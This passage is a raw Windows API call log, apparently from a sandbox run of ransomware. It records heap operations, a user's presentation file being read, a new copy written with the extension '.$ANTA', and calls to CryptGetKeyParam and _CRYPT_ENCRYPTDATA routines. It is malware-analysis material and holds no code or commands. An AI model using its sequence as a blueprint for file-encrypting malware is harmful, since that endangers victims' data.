lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0130.491] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0130.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0130.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0130.491] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0130.491] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0130.491] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0130.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0130.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0130.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0130.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\b029yg4ltntgmmqx_g.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0130.493] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.493] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0130.493] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0130.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0130.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0130.494] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0130.494] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0130.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0130.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0130.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0130.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0130.495] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0130.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0130.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0130.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0130.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0130.496] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\b029yg4ltntgmmqx_g.odp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0130.592] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0130.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0130.593] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.593] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0130.593] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0130.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b8e020 [0130.597] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0130.597] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x823f, lpOverlapped=0x0) returned 1 [0130.599] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0130.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x823f) returned 0x49aa010 [0130.602] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x823f) returned 0x49aa010 [0130.602] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0130.602] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0130.602] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0130.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0130.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0130.602] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0130.602] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0130.603] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0130.603] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0130.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0130.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.603] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0130.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0130.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797008 [0130.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0130.604] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e29f0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e29f0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 